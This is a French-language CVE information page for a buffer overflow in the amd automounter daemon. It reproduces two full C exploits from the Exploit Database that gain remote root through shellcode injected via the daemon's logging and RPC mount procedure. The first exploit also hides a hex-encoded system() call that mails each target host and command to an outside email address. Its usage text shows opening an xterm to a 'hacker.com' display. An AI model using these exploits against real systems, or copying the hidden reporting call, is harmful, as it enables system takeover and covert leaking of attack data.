Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Buffer overflow in Berkeley automounter daemon (amd) logging facility provided in the Linux am-utils package and others.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19478
Date de publication : 1999-08-30 22h00 +00:00
Auteur : Taeho
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/614/info
There is a remotely exploitable buffer overflow condition in the amd daemon under several operating systems. Amd is a daemon that automatically mounts filesystems whenever a file or directory within that filesystem is accessed. Filesystems are automatically unmounted when they appear to have become quiescent.
The vulnerability is in the log functions of the daemon.
Red Hat Linux 4.2 shipped originally with a version of amd that is no longer being maintained. Since Red Hat Linux 5.0 we have switched to am-utils. This release of am-utils has been backported to 4.2 and it will obsolete the original 4.2 amd package.
begin amd-ex.c
----------------------------------------------------------------------
/*
Amd Buffer Overflow for x86 linux
Remote user can gain root access.
Tested redhat linux : 4.0, 5.1, 6.0
Tested am-utils version : 6.0
What requires
/usr/sbin/amq
Usage
$ amd-ex <hostname> <command> [offset]
Warning : This program can crash amd.
This program is only for demonstrative use only.
USE IT AT YOUR OWN RISK!
Programmed by Taeho Oh 1999/08/31
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
*/
#include<stdio.h>
#include<stdlib.h>
#define OFFSET 0
#define RET_POSITION 1002
#define RANGE 20
#define NOP 0x90
char shellcode[1024]=
"\xeb\x35" /* jmp 0x35 */
"\x5e" /* popl %esi */
"\x89\x76\x0b" /* movl %esi,0xb(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x0b" /* movl %eax,0xb(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x0b" /* addl $0xb,%eax */
"\x89\x46\x0b" /* movl %eax,0xb(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x88\x46\x0a" /* movb %eax,0xa(%esi) */
"\x88\x46\x0b" /* movb %eax,0xb(%esi) */
"\x89\x46\x0b" /* movl %eax,0xb(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */
"\x8d\x56\x0b" /* leal 0xb(%esi),%edx */
"\xcd\x80" /* int 0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int 0x80 */
"\xe8\xc6\xff\xff\xff" /* call -0x3a */
"/bin/sh -c "; /* .string "/bin/sh -c "*/
char command[800];
void usage()
{
printf("Warning : This program can crash amd\n");
printf("Usage: amd-ex <hostname> <command> [offset]\n");
printf("ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n");
}
int main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+1],*ptr;
char target[256];
char cmd[1024];
long *addr_ptr,addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
int i;
printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n");
printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n");
printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n");
if(argc<3)
{
usage();
exit(1);
}
if(argc>2)
{
strcpy(target,argv[1]);
strcpy(command,argv[2]);
}
if(argc>3)
offset=atoi(argv[3]);
shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
shellcode[32]=(shellcode[32]+strlen(command));
shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
strcat(shellcode,command);
strcpy(cmd,"\x65\x63\x68\x6f\x20");
strcat(cmd,target);
strcat(cmd,"\x20");
strcat(cmd,command);
strcat(cmd,"\x7c");
strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");
sp=0xbffff34d;
addr=sp-offset;
ptr=buff;
addr_ptr=(long*)ptr;
for(i=0;i<bsize;i+=4)
*(addr_ptr++)=addr;
for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
for(i=bsize;i>1;i--)
buff[i-1]=buff[i-2];
buff[bsize-1]='\0';
printf("Jump to 0x%08x\n",addr);
system(cmd); /* If you want, comment out this line. :) */
execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
}
----------------------------------------------------------------------
end amd-ex.c
Exploit Database EDB-ID : 19479
Date de publication : 1999-08-29 22h00 +00:00
Auteur : c0nd0r
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/614/info
There is a remotely exploitable buffer overflow condition in the amd daemon under several operating systems. Amd is a daemon that automatically mounts filesystems whenever a file or directory within that filesystem is accessed. Filesystems are automatically unmounted when they appear to have become quiescent.
The vulnerability is in the log functions of the daemon.
Red Hat Linux 4.2 shipped originally with a version of amd that is no longer being maintained. Since Red Hat Linux 5.0 we have switched to am-utils. This release of am-utils has been backported to 4.2 and it will obsolete the original 4.2 amd package.
/*
* SDI rpc.AMD automountd remote exploit for RedHat Linux
* Sekure SDI - Brazilian Information Security Team
* by c0nd0r <condor@sekure.org> - Jul/99
*
* AMD doesn't check bounds in the plog() function, so we may
* call the procedure 7 and exploit this vulnerability.
* It has been tested under rh5.2/5.0 but this vulnerability exists in
* all versions.
*
* Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo),
* vader, fcon, slide, corb, soft distortion and specially to
* my sasazita! Also lots of thanks to toxyn.org(frawd,r00t),
* pulhas.org, phibernet, superbofh(seti) and el8.org (duke).
* #uground (brasnet), #sdi(efnet), #(phibernet).
*
* usage: SDIamd -h <host> -c <command> [-p <port>] [-o <offset>]
* where -p <port> will bypass the portmap.
*
* Warning: We take no responsability for the consequences on using this
* tool. DO NOT USE FOR ILICIT ACTIVITIES!
*
* Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira
* de seguranca - BOS-BR <bos-br-request@sekure.org>. Fiquem ligado na
* nova pagina do grupo!
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define AMQ_PROGRAM ((u_long)300019)
#define AMQ_VERSION ((u_long)1)
#define AMQPROC_MOUNT ((u_long)7)
#define AMQ_STRLEN 1024
#define XDRPROC_T_TYPE xdrproc_t
#define voidp void *
#define NOP 0x90
char shellcode[] =
"\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0"
"\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3"
"\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c ";
//typedef bool_t (*xdrproc_t) __P ((XDR *, __ptr_t, ...));
typedef char *amq_string;
typedef long *time_type;
typedef struct amq_mount_tree amq_mount_tree;
typedef amq_mount_tree *amq_mount_tree_p;
struct amq_mount_tree {
amq_string mt_mountinfo;
amq_string mt_directory;
amq_string mt_mountpoint;
amq_string mt_type;
time_type mt_mounttime;
u_short mt_mountuid;
int mt_getattr;
int mt_lookup;
int mt_readdir;
int mt_readlink;
int mt_statfs;
struct amq_mount_tree *mt_next;
struct amq_mount_tree *mt_child;
};
bool_t
xdr_amq_string(XDR *xdrs, amq_string *objp)
{
if (!xdr_string(xdrs, objp, AMQ_STRLEN)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_time_type(XDR *xdrs, time_type *objp)
{
if (!xdr_long(xdrs, (long *) objp)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_amq_mount_tree(XDR *xdrs, amq_mount_tree *objp)
{
if (!xdr_amq_string(xdrs, &objp->mt_mountinfo)) {
return (FALSE);
}
if (!xdr_amq_string(xdrs, &objp->mt_directory)) {
return (FALSE);
}
if (!xdr_amq_string(xdrs, &objp->mt_mountpoint)) {
return (FALSE);
}
if (!xdr_amq_string(xdrs, &objp->mt_type)) {
return (FALSE);
}
if (!xdr_time_type(xdrs, &objp->mt_mounttime)) {
return (FALSE);
}
if (!xdr_u_short(xdrs, &objp->mt_mountuid)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_getattr)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_lookup)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_readdir)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_readlink)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_statfs)) {
return (FALSE);
}
if (!xdr_pointer(xdrs, (char **) &objp->mt_next, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
return (FALSE);
}
if (!xdr_pointer(xdrs, (char **) &objp->mt_child, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_amq_mount_tree_p(XDR *xdrs, amq_mount_tree_p *objp)
{
if (!xdr_pointer(xdrs, (char **) objp, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
return (FALSE);
}
return (TRUE);
}
int usage ( char *arg) {
printf ( "Sekure SDI - AMD remote exploit for linux\n");
printf ( "usage: %s -h <host> -c <command> [-o <offset>] [-p <port>] [-u] \n", arg);
printf ( " where: [port] will bypass portmap\n");
printf ( " [-u ] will use udp instead of tcp\n");
exit (0);
}
int *amqproc_mount_1(voidp argp, CLIENT *clnt);
int main ( int argc, char *argv[] ) {
CLIENT *cl;
struct timeval tv;
struct sockaddr_in sa;
struct hostent *he;
char buf[8000], *path = buf, comm[200], *host, *cc;
int sd, res, x, y, offset=0, c, port=0, damn=0, udp=0;
long addr = 0xbffff505;
while ((c = getopt(argc, argv, "h:p:c:o:u")) != -1)
switch (c) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'c':
cc = optarg;
break;
case 'o':
offset = atoi ( optarg);
break;
case 'u':
udp = 1;
break;
default:
damn = 1;
break;
}
if (!host || !cc || damn) usage ( argv[0]);
sa.sin_family = AF_INET;
he = gethostbyname ( host);
if (!he) {
if ( (sa.sin_addr.s_addr = inet_addr ( host)) == INADDR_NONE) {
printf ( "unknown host, try again pal!\n");
exit ( 0);
}
} else
bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
sa.sin_port = htons(port);
sd = RPC_ANYSOCK;
tv.tv_sec = 10;
tv.tv_usec = 0;
snprintf ( comm, sizeof(comm), "%s", cc);
if ( strlen(comm) >= 160) {
printf ( "command too long\n");
exit (0);
} else {
comm[strlen(comm)] = ';';
for ( x = strlen(comm); x < 160; x++)
comm[x] = 'A';
}
addr += offset;
for ( x = 0; x < (1001-(strlen(shellcode)+strlen(comm))); x++)
buf[x] = NOP;
for ( y = 0; y < strlen(shellcode); x++, y++)
buf[x] = shellcode[y];
for ( y = 0; y < strlen(comm); x++, y++)
buf[x] = comm[y];
printf ( "SDI automountd remote exploit for linux\n");
printf ( "Host %s \nRET 0x%x \nOFFset %d \n", host, addr, offset);
for ( ; x < 1020; x+=4) {
buf[x ] = (addr & 0x000000ff);
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
buf[strlen(buf)] = '\0';
if (!udp) {
if ((cl = clnttcp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, &sd, 0, 0)) ==
NULL)
{
clnt_pcreateerror("clnt_create");
exit (-1);
}
} else {
if ((cl = clntudp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, tv, &sd)) ==
NULL)
{
clnt_pcreateerror("clnt_create");
exit (-1);
}
}
printf ( "PORT %d \n", ntohs(sa.sin_port));
printf ( "Command: %s \n", cc);
amqproc_mount_1 (&path, cl);
clnt_destroy ( cl);
}
int *
amqproc_mount_1(voidp argp, CLIENT *clnt)
{
static int res;
struct timeval TIMEOUT = {10, 0};
memset((char *) &res, 0, sizeof(res));
if (clnt_call(clnt, AMQPROC_MOUNT, (XDRPROC_T_TYPE) xdr_amq_string, argp,
(XDRPROC_T_TYPE) xdr_int, (caddr_t) & res,
TIMEOUT) != RPC_SUCCESS) {
printf ( "voce e' um hax0r!\n");
printf ( "don't forget to restart amd: /etc/rc.d/init.d/amd start\n");
clnt_perror ( clnt, "clnt_call");
return (NULL);
}
printf ( "exploit failed\n");
return (&res);
}
Products Mentioned
Configuraton 0
Bsdi>>Bsd_os >> Version 3.1
- Bsdi>>Bsd_os >> Version 3.1 (Open CPE detail)
Bsdi>>Bsd_os >> Version 4.0.1
- Bsdi>>Bsd_os >> Version 4.0.1 (Open CPE detail)
Freebsd>>Freebsd >> Version 3.0
- Freebsd>>Freebsd >> Version 3.0 (Open CPE detail)
Freebsd>>Freebsd >> Version 3.1
- Freebsd>>Freebsd >> Version 3.1 (Open CPE detail)
Freebsd>>Freebsd >> Version 3.2
- Freebsd>>Freebsd >> Version 3.2 (Open CPE detail)
Redhat>>Linux >> Version 4.2
- Redhat>>Linux >> Version 4.2 (Open CPE detail)
Redhat>>Linux >> Version 5.0
- Redhat>>Linux >> Version 5.0 (Open CPE detail)
Redhat>>Linux >> Version 5.1
- Redhat>>Linux >> Version 5.1 (Open CPE detail)
Redhat>>Linux >> Version 5.2
Redhat>>Linux >> Version 6.0
Références
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.